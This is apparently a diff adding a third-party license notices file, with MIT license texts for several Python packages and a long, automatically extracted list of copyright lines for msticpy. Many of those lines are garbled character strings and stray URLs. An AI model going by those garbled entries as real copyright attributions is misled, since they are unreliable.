+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+jsonschema 4.3.3 - MIT
+
+
+Julian Berman copyright 2013
+Copyright (c) 2012 Julian Berman
+Copyright (c) 2013 Julian Berman
+Copyright (c) Twisted Matrix Laboratories.
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+msal 1.16.0 - MIT
+
+
+Copyright (c) Microsoft Corporation.
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+msal-extensions 0.3.1 - MIT
+
+
+Copyright (c) Microsoft Corporation.
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+msrest 0.6.21 - MIT
+
+
+Copyright (c) Microsoft Corporation.
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+msrestazure 0.6.4 - MIT
+
+
+Copyright (c) Microsoft Corporation.
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+msticpy 1.5.2 - MIT
+
+
+(c) Bv
+(c) CO
+(c) BvA
+(c) coB
+(c) H U3
+(c) Hp X
+(c) I3 Y
+(c) M2 Y
+(c) O3 Y
+(c) Va Y
+(c) Wa Y
+(c) EY Ij
+(c) Ca U3a
+(c) CaA CO
+(c) EHI Ee
+(c) C/ 2006
+(c) CD Land
+(c) Hx SSea
+(c) MY LIao
+(c) Take IT
+(c) (c) AAEE
+(c) Eac Aaef
+(c) e (c) SS
+(c) u (c) OY
+(c) (c) O1981
+(c) AAeAE WEd
+(c) AU Ass CN
+(c) AUueAo AI
+(c) ET. Where
+(c) OAAnPaE I
+(c) OY H-aaoY
+(c) OY HAySSU
+(c) aa (c) PS
+(c) o, (c) MY
+(c) sY (c) OY
+(c) !eI (c) FE
+(c) AEB AdegeP
+(c) L FWaIoaXs
+(c) M1960~1980
+(c) N Revealed
+(c) uAe (c) PY
+(c) uu?i 2003A
+Copyright 2004
+Copyright 2005
+Copyright 2006
+Copyright 2017
+copyright 2019
+(c) CaAU Audegi
+(c) lEEe (c) AE
+(c) w'Au AASSQY
+(c) AEAAIAo AaAI
+(c) Access Token
+(c) nEJW (c) EHI
+(c) pAh (c) ASSU
+Copyright (c) AB
+copyright u'2001
+(c) 2014 (c) FSF.
+(c) P. name Color
+(c) Sindre Sorhus
+(c) aA'AE (c) 1AE
+(c) aAua$? (c) HH
+(c) A1/2cC/ (c) EB
+(c) Ao2- AIdegPSAo
+(c) EDiETCgDi Hiro
+(c) F!ASSUI (c) IY
+Copyright (c) 2005
+Copyright (c) 2006
+Copyright (c) 2016
+(c) Au IUAEnCIeAEai
+(c) Laurent LAPORTE
+(c) OY H2 (c), 1998
+(c) Redirection URI
+(c) 2011 Gary Court.
+(c) ESSO!A (c) ESSOY
+(c) Python and NumPy
+(c) aEaIAua$? (c) EH
+(c) (r)IE bvAbvAi'u'I
+(c) AUueAI PEdegdegAo
+(c) AUueAo PEdegdegAo
+(c) http://flickr.com
+copyright Ian Bicking
+(c) 2006 Entrust, Inc.
+(c) 2007 GeoTrust Inc.
+(c) I3 3QPAZP-'PSY Xao
+(c) aueU1nB 2006-01-02
+Copyright 2007 Pallets
+EAEvAACAEe (c) ,!C2001
+copyright 2010 Pallets
+copyright 2017 Project
+(c) 2004 - 2005, Efendi
+(c) 2008 VeriSign, Inc.
+(c) U. John Battelledeg
+(c) V End (c) 2000-2003
+(c) aueU1nEB 2006-01-03
+Copyright (c) 2004-2005
+Copyright (c) 2005-2006
+Copyright (c) 2007-2016
+Copyright (c) 2007-2017
+Copyright (c) 2007-2018
+Copyright (c) 2007-2019
+Copyright 2011 Facebook
+Copyright 2013-2014 Ray
+(c) 2004 Foo Corporation
+(c) lPi$?JotAAdege!A1962
+(c) uu?i 1/41o 2003 CN1o
+Copyright (c) 2006, AND0
+Copyright (c) 2015 CERN.
+Copyright 2013 Wikimedia
+Copyright Fedor Indutny.
+copyright 2006. Uploaded
+(c) 2015 Andreas Rossberg
+(c) EREaC/-eAEC/$? (c) RL
+(c) Justin Fletcher, 1998
+Copyright (c) 2006, Manni
+Copyright (c) 2013 Min RK
+Copyright (c) 2014 Dan Le
+Copyright Jason R. Coombs
+(c) uu?i 1/41o 2003A Intel
+AOdegi Copyright 2003-2006
+Copyright (c) 1998 Comment
+Copyright (c) 2004 Infrae.
+Copyright (c) ISO/IEC 2015
+Copyright (c) Rich Hickey.
+Copyright (c) SecureWorks.
+Copyright 2007 Google Inc.
+Copyright 2008 Google Inc.
+Copyright 2011 Gary Court.
+Copyright 2015 Google Inc.
+Copyright 2019 Google LLC.
+Copyright Dave Gandy 2016.
+copyright BBCHungarian.com
+(c) (c) O1981 (c) AAeAE WEd
+(c) ,oua http://sosa0sa.com
+(c) AUueAo AoY I PEdegdegAo
+(c) BJoel on SoftwareICgEaA
+(c) CIAEdeg MSAC Classified
+Copyright (c) 2005 Carshops
+Copyright (c) INRIA - Serge
+Copyright 2005 Brian Alliet
+Copyright 2018 Mike Bostock
+copyright 2014, Al Sweigart
+copyright 2019 Plotly, Inc.
+(c) ,SSCI'A http://kysky.com
+(c) -deg!Ao ?PoAI degOAOA CO
+(c) 1999 Entrust.net Limited
+(c) 2009 Entrust, Inc. - for
+(c) 2012 Entrust, Inc. - for
+(c) 2015 Entrust, Inc. - for
+(c) Justin Fletcher, 1998 40
+(c) a http://konkurs.susu.ru
+Copyright (c) 2006, Grebeweb
+Copyright (c) 2012, Ben Hoyt
+Copyright (c) 2017 Microsoft
+Copyright (c) 2018 Microsoft
+Copyright (c) Frederick Dean
+Copyright 2006, Paul McGuire
+Copyright 2008, Paul McGuire
+Copyright 2009, Gerhard Weis
+Copyright 2010, Paul McGuire
+Copyright 2011, Paul McGuire
+Copyright 2015 Red Hat, Inc.
+Copyright 2015 Ruben De Smet
+Copyright 2015, Paul McGuire
+Copyright 2016, Paul McGuire
+Copyright 2017 Virgil Dupras
+Copyright 2018, Paul McGuire
+Copyright 2019 Kenneth Reitz
+Copyright 2019 Mike Bostock.
+Copyright 2019, Paul McGuire
+Copyright Paul McGuire, 2019
+copyright 2006, Paul McGuire
+(c) $?cAAAzEnPaEC/I (c) HAASS
+(c) 2009-2016 Michael Leibman
+(c) L FWaIoaXs (c) M1960~1980
+Copyright (c) 1991, 1992, Jos
+Copyright (c) 2008 Silken Web
+Copyright (c) 2013 Aaron Iles
+Copyright (c) 2014 Adam Krebs
+Copyright (c) 2017 Spyder IDE
+Copyright (c) 2018 Isaac Muse
+Copyright 2008 Chris Lambrou.
+Copyright 2009 Brian Quinlan.
+Copyright 2012 by Simon Sapin
+Copyright 2017, Thomas Moreau
+Copyright, 2010, Paul McGuire
+(c) Lionhard Technologies 2003
+(c) g(r)R'Nn?o$?F!I!v!A (c) OY
+(c) o a http://www.pots.com.tw
+Copyright (c) 2011 Google Inc.
+Copyright (c) 2012 Google Inc.
+Copyright 2005 (c) B Pool Game
+Copyright 2007 by Paul McGuire
+Copyright 2010, Gael Varoquaux
+Copyright 2012, Olivier Grisel
+Copyright, 2007 - Paul McGuire
+Copyright, 2012 - Paul McGuire
+copyright (c) by Lennart Ochel
+copyright 2015, Thomas Kluyver
+copyright 2017, Thomas Kluyver
+copyright 2019 (c) CaAU Audegi
+copyright AtomicPages LLC 2014
+(c) http://blog.mlmaster.com/?p
+(c) http://susu.ac.ru/gerb2.gif
+(c) self.assertEqual http://ns1
+Copyright (c) 1994 X Consortium
+Copyright (c) 2004 Ian Bicking.
+Copyright (c) 2005 Movable Type
+Copyright (c) 2008 Slava Pestov
+Copyright (c) 2010 Justin Riley
+Copyright (c) 2014, Al Sweigart
+Copyright (c) 2015 Georg Brandl
+Copyright (c) 2015 Jose Padilla
+Copyright (c) 2016 Ville Vainio
+Copyright (c) 2017 ORGANIZATION
+Copyright 2006, by Paul McGuire
+Copyright 2008, 280 North, Inc.
+Copyright 2008, by Paul McGuire
+Copyright 2012, Paul T. McGuire
+copyright 2018, Paul T. McGuire
+copyright u'2014, Kenneth Reitz
+copyright u'2015, Enthought Ltd
+(c) ?idegE http://klutzy.x-y.net
+(c) Copyright 1999, Artran, Inc.
+(c) http://ch.kitaguni.tv/u/8280
+Copyright (c) 2000 Thomas Heller
+Copyright (c) 2003, Paul McGuire
+Copyright (c) 2004, Paul McGuire
+Copyright (c) 2005 AmbitUSA Inc.
+Copyright (c) 2006, Paul McGuire
+Copyright (c) 2008 Rick Jelliffe
+Copyright (c) 2009 PiCloud, Inc.
+Copyright (c) 2009 Zarko Zivanov
+Copyright (c) 2009-2010, Gary L.
+Copyright (c) 2010 Brian Granger
+Copyright (c) 2012 Julian Berman
+Copyright (c) 2013 Donald Stufft
+Copyright (c) 2014 Fullstack.io.
+Copyright (c) 2015 Thomas Pornin
+Copyright (c) 2016, Paul McGuire
+Copyright 2004 Manfred Stienstra
+Copyright 2010,2019 Paul McGuire
+Copyright 2010-2015 Mike Bostock
+Copyright 2011-2015 Splunk, Inc.
+Copyright 2013 Alexander Peslyak
+Copyright 2014-2019 Volker Sorge
+Copyright 2015-2018 Jose Padilla
+Copyright, 2006, by Paul McGuire
+copyright (c) 2015 Thomas Pornin
+copyright u'2014, Thomas Kluyver
+(c) Copyright 2005, Sharks.co.il.
+(c) o1/4!Y http://artifact-jp.com
+(c) uu?i 1/41o 2003A Intel AOdegi
+Copyright (c) 2008 Gael Varoquaux
+Copyright (c) 2009 Gael Varoquaux
+Copyright (c) 2010 Damien Miller.
+Copyright (c) 2010 Doug Hellmann.
+Copyright (c) 2010 Gael Varoquaux
+Copyright (c) 2013, Ethan Furman.
+Copyright (c) 2014 Jameson Little
+Copyright (c) 2014 Kenneth Reitz.
+Copyright (c) 2017 Thomas Kluyver
+Copyright (c) 2017, Virgil Dupras
+Copyright (c) 2019 TAHRI Ahmed R.
+Copyright (c) Jean-Paul Calderone
+Copyright 2002-2018, Paul McGuire
+Copyright 2005-2006, Paul McGuire
+Copyright 2009, 2011 Paul McGuire
+Copyright 2010 Pallets EAEvAACAEe
+Copyright 2011-2016 Twitter, Inc.
+Copyright 2011-2019 Twitter, Inc.
+Copyright 2012-2013 Ulrich Sossou
+Portions (c) 2009 by Robert Kern.
+copyright (c) 2004 by Andre Simon
+copyright 2007 by Armin Ronacher.
+copyright u'2015, Hynek Schlawack
+(c) ,!C2001 copyright 2007 Pallets
+(c) B OEo1/2, L-IEzIaAUCUe Ch bvEm
+Copyright (c) 2010 Lisandro Dalcin
+Copyright (c) 2010 Three Dub Media
+Copyright (c) 2011 Fabrice Bellard
+Copyright (c) 2012 Alexei Boronine
+Copyright (c) 2013 Matthew Rocklin
+Copyright (c) 2014, Thomas Kluyver
+Copyright (c) 2015 Hynek Schlawack
+Copyright (c) 2016 Jorik Tangelder
+Copyright (c) 2017 Johannes Holzl.
+Copyright (c) 2017 Laurent LAPORTE
+Copyright (c) 2017- Spyder Project
+Copyright (c) 2018 Paul T. McGuire
+Copyright (c) Alexandru Marasteanu
+Copyright 2007-2012 LassoSoft Inc.
+Copyright Ellis & Grant, Inc. 2005
+copyright (c) 2015 by Calin Barbat
+copyright Shuttleworth Foundation.
+copyright u'2009-2013, Tres Seaver
+(c) a'C/Y aa'aY a http://susu.ac.ru
+(c) o1998 ~07$?eP!?iY Hx wCnE$?iaeU
+Copyright (c) 2001. Addison-Wesley.
+Copyright (c) 2010 The IPython Team
+Copyright (c) 2011 Andrei Mackenzie
+Copyright (c) 2013 Amazon.com, Inc.
+Copyright (c) 2013, Martin Journois
+Copyright (c) 2013-2019 Frank Denis
+Copyright (c) 2014, Enthought, Inc.
+Copyright (c) 2014-2017, PhosphorJS
+Copyright (c) 2015, Enthought, Inc.
+Copyright (c) 2016-2018 Plotly, Inc
+Copyright (c) 2017-2019 Philip Hane
+Copyright (c) 2019 RunningCoder.org
+Copyright (c) Stef van der Struijk.
+Copyright 1999-2011 Comment Comment
+Copyright 2003-2009 by Paul McGuire
+Copyright 2005 Brian Alliet Comment
+Copyright 2007-2012 Steven Levithan
+Copyright 2011 The Closure Compiler
+Copyright 2011,2015 Paul T. McGuire
+(c) ,oua 1/2o+-o KM http://pm2.ww.to
+(c) PyZMQ Developers. Copyright 2006
+Copyright (c) 2003,2019 Paul McGuire
+Copyright (c) 2004-2010 Rick Jellife
+Copyright (c) 2005-2007 Terence Parr
+Copyright (c) 2006,2016 Paul McGuire
+Copyright (c) 2007 Cybozu Labs, Inc.
+Copyright (c) 2009 Raymond Hettinger
+Copyright (c) 2011- PyZMQ Developers
+Copyright (c) 2011-2012 Travis Cline
+Copyright (c) 2011-2015 Splunk, Inc.
+Copyright (c) 2013, Min Ragan-Kelley
+Copyright (c) 2019 Tobias Gustafsson
+Copyright (c) Microsoft Corporation.
+Copyright 2003, 2019 by Paul McGuire
+Copyright 2003-2005 A Muvelodes Haza
+Copyright 2004-2016, by Paul McGuire
+Copyright 2007-2011, by Paul McGuire
+Copyright 2010, 2019 by Paul McGuire
+Copyright 2012-2018 Manas Technology
+copyright (c) 2012 by Kenneth Reitz.
+copyright (c) 2017 by Kenneth Reitz.
+copyright International Organization
+copyright u'2009-2011, Brian Quinlan
+copyright u'2012, Leonard Richardson
+(c) ,oua http://jungti1234.netcci.net
+(c) AU+-a 1/4?i?! ?APodeg! oA3/4ss CO
+Copyright (c) 2003,2016, Paul McGuire
+Copyright (c) 2004, 2006 Paul McGuire
+Copyright (c) 2004-2016, Paul McGuire
+Copyright (c) 2006-2016, Paul McGuire
+Copyright (c) 2007-2012 Michael Foord
+Copyright (c) 2010 by Armin Ronacher.
+Copyright (c) 2012 Godefroid Chapelle
+Copyright (c) 2014, Jonathan Slenders
+Copyright (c) 2015, Jonathan Slenders
+Copyright (c) 2015-2019 Martin Hensel
+Copyright (c) 2017, Intel Corporation
+Copyright (c) 2018 Copyright 2013 Ray
+Copyright (c) PyZMQ Development Team.
+Copyright 2012,2013 Alexander Peslyak
+Copyright 2015 The Prometheus Authors
+Copyright The Python Markdown Project
+copyright (c) 2014 by Armin Ronacher.
+copyright (c) HicknHack Software Gmbh
+copyright (c) Samuel Neves, 2013-2015
+(c) Name.Entity Copyright 2006 by Text
+(c) cao http://www.daihung.com/blog/?p
+Copyright (c) 2003-2013, Michael Foord
+Copyright (c) 2004, 2005, 2006 Aelitis
+Copyright (c) 2006, 2016, Paul McGuire
+Copyright (c) 2006-2016 Kirill Simonov
+Copyright (c) 2008-2017, Eli Bendersky
+Copyright (c) 2010 Andrew Gwozdziewycz
+Copyright (c) 2010-2011 Gael Varoquaux
+Copyright (c) 2012 The ZeroMQ Authors.
+Copyright (c) 2015 DH electronics GmbH
+Copyright (c) 2017-2018 Spyder Project
+Copyright (c) Individual contributors.
+Copyright 1997 University of Cambridge
+Copyright 2007-2013 by the Sphinx team
+Copyright copy 2003-2013 Paul McGuire.
+copyright 2008-2018, Joblib developers
+copyright The IPython Development Team
+(Copyright (c) 2017, Intel Corporation)
+(c) 2015 Adam Krebs, Jimmy Yuen Ho Wong
+(c) Holger Krekel and others, 2004-2014
+(c) Redirection URI Copyright 2013-2018
+Copyright (c) 2003-2019 Paul T. McGuire
+Copyright (c) 2006 Herczeg Jozsef Tamas
+Copyright (c) 2008 Slava Pestov Comment
+Copyright (c) 2009-2010, Gary L. Cutler
+Copyright (c) 2010 by the Pallets team.
+Copyright (c) 2010, Gary L. Cutler, GPL
+Copyright (c) 2019 (c) PyZMQ Developers
+Copyright (c) IPython Development Team.
+Copyright (c) Jupyter Development Team.
+Copyright 2005 url http://wordpress.org
+Copyright 2005,2007,2009 Colin Percival
+Copyright David Halter and Contributors
+Portions (c) International Organization
+(c) JS Foundation and other contributors
+(c) R1B!n!@The Nature and Destiny of Man
+Copyright (c) 1997 Borland International
+Copyright (c) 1999-2003 by Fredrik Lundh
+Copyright (c) 1999-2004 by Fredrik Lundh
+Copyright (c) 1999-2009 by Fredrik Lundh
+Copyright (c) 2001-2015 by Michael Shell
+Copyright (c) 2003, 04 by Johannes Barre
+Copyright (c) 2004-2011 Paul T. McGuire.
+Copyright (c) 2005-2009, Jochen Kalmbach
+Copyright (c) 2005-2013, Jochen Kalmbach
+Copyright (c) 2012-2013 Nenad Rakocevic.
+Copyright (c) 2014-2015, Jon Schlinkert.
+Copyright (c) 2014-2016, Jon Schlinkert.
+Copyright (c) 2014-2017, Jon Schlinkert.
+Copyright 2003, Greenline, Kazan, Russia
+Copyright 2005 Dow Jones & Company, Inc.
+Copyright 2006-2009 by the Pygments team
+Copyright 2006-2019 by the Pygments team
+copyright 2015, IPython Development Team
+copyright 2015, Jupyter Development Team
+Copyright (c) 1998 the Initial Developer.
+Copyright (c) 1999-2003 by Secret Labs AB
+Copyright (c) 1999-2007 by Fredrik Lundh.
+Copyright (c) 2000-2001, Aaron D. Gifford
+Copyright (c) 2001 by Andrei Alexandrescu
+Copyright (c) 2001 the Initial Developer.
+Copyright (c) 2003 Sun Microsystems, Inc.
+Copyright (c) 2003-2004 by Fredrik Lundh.
+Copyright (c) 2003-2009 by Fredrik Lundh.
+Copyright (c) 2005 the Initial Developer.
+Copyright (c) 2010-2019 Benjamin Peterson
+Copyright (c) 2012 - 2018, Anaconda, Inc.
+Copyright (c) 2012 - 2021, Anaconda, Inc.
+Copyright (c) 2013 (c) Noam Yorav-Raphael
+Copyright (c) 2014 - 2015, Hsiaoming Yang
+Copyright (c) 2014 copro Coproduc cop COP
+Copyright (c) 2019 The OAuthlib Community
+Copyright 2004, 2005, 2006 Yuri Takhteyev
+Copyright 2012 Nokia Siemens Networks Oyj
+copyright u'2004-2015, Leonard Richardson
+copyright u'2011-2015, Nathaniel J. Smith
+(c) eEue1/2 http://px.a8.net/svt/ejp?a8mat
+(http://www.dabeaz.com) Copyright (c) 2017
+Copyright (c) 1993-2003 Yukihiro Matsumoto
+Copyright (c) 2003 Shuttleworth Foundation
+Copyright (c) 2004-2017 Leonard Richardson
+Copyright (c) 2004-2019 Leonard Richardson
+Copyright (c) 2005-2016, Michele Simionato
+Copyright (c) 2005-2018, Michele Simionato
+Copyright (c) 2006-2013 Alexander Chemeris
+Copyright (c) 2007-2010 iMatix Corporation
+Copyright (c) 2011-2012, Patsy Developers.
+Copyright (c) 2013-present, Facebook, Inc.
+Copyright (c) The Jupyter Development Team
+Copyright (c) Twisted Matrix Laboratories.
+(c) !E http://blog.livedoor.jp/facilitators
+(c) ae ol li a http://www.tipilp.susu.ac.ru
+(c) oW3Ooo W3Ooo http://www.coolloud.org.tw
+Copyright (c) 2011 by MarkLogic Corporation
+Copyright (c) 2013-2017 by Christian Heimes
+Copyright (c) 2014-2017, Mozilla Foundation
+Copyright (c) 2015 - Thomson Licensing, SAS
+Copyright (c) 2015- - dateutil contributors
+copyright 2015- s, Jupyter Development Team
+copyrighted by the Free Software Foundation
+(c) 1/21... REBOOTED http://andore.com/money
+(c) 2010 Jeremy Ashkenas, DocumentCloud Inc.
+(c) aae http://money.rin.ru/content/news/?id
+(c) http://kapranoff.ru/archives/003650.html
+(c) opyright 2003, MetaQuotes Software Corp.
+Copyright (c) 2006, Estrate, the Netherlands
+Copyright (c) 2009-2010, Gary L. Cutler, GPL
+Copyright (c) 2011, IPython Development Team
+Copyright (c) 2012 IPython Development Team.
+Copyright (c) 2015, IPython Development Team
+Copyright 1989 by Carnegie Mellon University
+Copyright 2001, Nikolay Hristov Movable Type
+Copyright 2004-2005 Elemental Security, Inc.
+Copyright 2006-'+date (c) openEHR Foundation
+Copyright 2014 David Halter and Contributors
+copyright (c) 2014 - 2018 by Hsiaoming Yang.
+copyright (c) 2015 by Grzegorz Mazur Loosely
+copyright (c) 2016 Jared Dean, SAS Institute
+copyright (c) 2019 by The OAuthlib Community
+copyright (c) by Marijn Haverbeke and others
+(c) B http://sasuga.biz/pages/index.php?refid
+(c) C/AEd http://cosoft.org.cn/projects/webpm
+(c) http://azoz.org/archives/200512031633.php
+Copyright (c) 1998-2009, Modelica Association
+Copyright (c) 2008, IPython Development Team.
+Copyright (c) 2012, IPython Development Team.
+Copyright (c) 2013, Nucleic Development Team.
+Copyright (c) 2014 Copyright Dave Gandy 2016.
+Copyright (c) 2014-, Jupyter development team
+Copyright (c) 2017, Jupyter Development Team.
+Copyright (c) 2020-, Jupyter Development Team
+Copyright (c) Thomas Kluyver and contributors
+Copyright 2005 (c) B Pool Game Copyright 2007
+(c) (c) AA+-C/IAtBGCg http://www.1affliate.com
+(c) +-,degO AIu?Ca http://deholexp.mizc.com/wp
+(c) <a href https://cartodb.com/attributions'>
+(c) Copyright 2014 Enthought, Inc., Austin, TX
+(c) Copyright 2015 Enthought, Inc., Austin, TX
+(c) Copyright 2017 Enthought, Inc., Austin, TX
+(c) Copyright 2018 Enthought, Inc., Austin, TX
+(c) EEEEBU1/2V1/2ENEu-1/2u'~XgvAaie$? (c) EAEB
+Copyright (c) 2008 Pauli Virtanen <pav@iki.fi>
+Copyright (c) 2008, Brian Frank and Andy Frank
+Copyright (c) 2009 Agendaless Consulting, Inc.
+Copyright (c) 2009-2018 The MathJax Consortium
+Copyright (c) 2010-2018 The MathJax Consortium
+Copyright (c) 2011-2015 The MathJax Consortium
+Copyright (c) 2015-, Jupyter Development Team.
+Copyright (c) 2018 Marek Vasut <marex@denx.de>
+Copyright (c) 2019, threadpoolctl contributors
+Copyright 1997 University of Cambridge Comment
+Copyright 2001-2016 Python Software Foundation
+Copyright 2003-2006 Copyright (c) 1998 Comment
+Copyright 2006-2014, 2016 by the Pygments team
+Copyright 2006-2014, MetaQuotes Software Corp.
+Copyright 2009-2013, MetaQuotes Software Corp.
+Copyright 2017- Paul Ganssle <paul@ganssle.io>
+Copyright JS Foundation and other contributors
+copyright 2006-2014, MetaQuotes Software Corp.
+(c) !PS ODE$?uAECPS!Google 1OuODgooglesucks.com
+(c) 3/4ss CN'U... http://kina.egloos.com/655614
+(c) C/AE'PeBOExI http://px.a8.net/svt/ejp?a8mat
+(c) Name.Entity 1998-2009, Modelica Association
+(c) cIpibx http://www.mag2.com/m/0000103697.htm
+(c) http://www.acnnewswire.net/Article.Asp?lang
+Copyright (c) 2008 The IPython Development Team
+Copyright (c) 2008-2016 Copyright 2010 Facebook
+Copyright (c) 2010 Sofian Brabez <sbz@6dev.net>
+Copyright (c) 2010, Gary L. Cutler, GPL Comment
+Copyright (c) 2011 The IPython Development Team
+Copyright (c) 2012 Olle Lundberg <geek@nerd.sh>
+Copyright (c) 2013 The IPython Development Team
+Copyright (c) 2014 The IPython Development Team
+Copyright (c) 2014-2017 Matthias C. M. Troffaes
+Copyright (c) 2015 Project Jupyter Contributors
+Copyright (c) 2016-2017 Copyright 2009 Facebook
+Copyright (c) 2017, Battelle Memorial Institute
+Copyright 2007-2018 The Python Markdown Project
+Copyright 2007-2019 The Python Markdown Project
+Copyright 2008-2014 The Python Markdown Project
+Copyright 2011-2014 The Python Markdown Project
+Copyright 2013-2014 The Python Markdown Project
+Copyright 2015-2018 The Python Markdown Project
+(c) 1/2A'U http://chisato.info/blog/index.php?pl
+(c) cC$?1/4 SRC http://inkase.net/if/docomo.html
+(c) cC$?1/4o http://www.motionlink.jp/clk.php?pt
+(c) http://andore.com/money/archives/003398.html
+Copyright (c) 1995-2004 Functional Objects, Inc.
+Copyright (c) 2010 Brian Granger, Fernando Perez
+Copyright (c) 2010-2011 IPython Development Team
+Copyright (c) 2012 The IPython Development Team.
+Copyright (c) 2012 Yipit, Inc <coders@yipit.com>
+Copyright (c) 2012- The IPython Development Team
+Copyright (c) 2013 Julian Berman u'Julian Berman
+Copyright (c) 2015, The Jupyter Development Team
+Copyright (c) 2018 The IPython Development Team.
+Copyright 2004-2008 Jean Privat <jean@pryen.org>
+Copyright 2004-2010 Copyright 2004, Paul McGuire
+Copyright 2007, 2008 The Python Markdown Project
+copyright 2017, Marcos CARDOSO & Laurent LAPORTE
+copyright u'2013, Noah Spurrier and contributors
+(c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc.
+(c) Copyright 2014-18 Enthought, Inc., Austin, TX
+(c) Copyright 2015-18 Enthought, Inc., Austin, TX
+(c) aIuOOINat < http://webryblog.biglobe.ne.jp/'>
